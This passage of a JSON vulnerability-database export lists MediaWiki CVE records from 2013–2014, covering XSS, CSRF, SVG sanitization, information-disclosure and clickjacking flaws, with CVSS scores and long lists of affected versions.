action.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[ebarretto](<https://launchpad.net/~ebarretto>) | On 1.19 action=info is disabled by default.\n", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "ubuntucve", "title": "CVE-2014-2853", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2014-04-29T00:00:00", "id": "UB:CVE-2014-2853", "href": "https://ubuntu.com/security/CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:21:05", "description": "Cross-site scripting (XSS) 
vulnerability in MediaWiki before 1.19.10, 1.2x\nbefore 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject\narbitrary web script or HTML via a -o-link attribute.", "cvss3": {}, "published": "2014-05-12T00:00:00", "type": "ubuntucve", "title": "CVE-2013-6454", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6454"], "modified": "2014-05-12T00:00:00", "id": "UB:CVE-2013-6454", "href": "https://ubuntu.com/security/CVE-2013-6454", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:38:57", "description": "Cross-site scripting (XSS) vulnerability in mediawiki.page.image.pagination.js in MediaWiki 1.22.x before 1.22.9 and 1.23.x before 1.23.2 allows remote attackers to inject arbitrary web script or HTML via vectors involving the multipageimagenavbox class in conjunction with an action=raw value.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "cve", "title": "CVE-2014-5242", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5242"], "modified": 
"2015-09-08T17:55:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.22.2"], "id": "CVE-2014-5242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:38:54", "description": "The JSONP endpoint in includes/api/ApiFormatJson.php in MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 accepts certain long callback values and does not restrict the initial bytes of a JSONP response, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks, and obtain sensitive information, via a crafted OBJECT element with SWF content consistent with a restricted character set.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "cve", "title": "CVE-2014-5241", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5241"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.19.15", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.14", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.21.10", "cpe:/a:mediawiki:mediawiki:1.21.9", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.19.17", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.21.5", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.20.8", 
"cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.16", "cpe:/a:mediawiki:mediawiki:1.21.4"], "id": "CVE-2014-5241", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5241", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.16:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.17:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.21.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.6:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:06", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 does not properly sanitize SVG files, which allows remote attackers to have unspecified impact via invalid XML.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6453", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-13T14:01:00", 
"cpe": ["cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.4"], "id": "CVE-2013-6453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:07", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via crafted XSL in an SVG 
file.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6452", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-13T13:36:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.7"], "id": "CVE-2013-6452", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", 
"cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:35:28", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to obtain information about deleted page via the (1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "cvss3": {}, "published": "2014-05-12T14:55:00", "type": "cve", "title": "CVE-2013-6472", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-13T14:43:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.7"], "id": "CVE-2013-6472", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:39:00", "description": "MediaWiki before 1.19.18, 1.20.x through 1.22.x before 1.22.9, and 1.23.x before 1.23.2 does not enforce an IFRAME protection mechanism for transcluded pages, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site.", "cvss3": {}, "published": "2014-08-22T17:55:00", "type": "cve", "title": "CVE-2014-5243", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5243"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.22.6", "cpe:/a:mediawiki:mediawiki:1.19.15", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.14", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.21.10", "cpe:/a:mediawiki:mediawiki:1.21.9", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.23.1", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.17", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.23.0", "cpe:/a:mediawiki:mediawiki:1.22.8", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.21.5", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.20.8", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.22.7", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.16", "cpe:/a:mediawiki:mediawiki:1.21.4"], "id": "CVE-2014-5243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5243", "cvss": 
{"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.15:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.16:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.23.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.17:*:*:*:*:*:*:*", 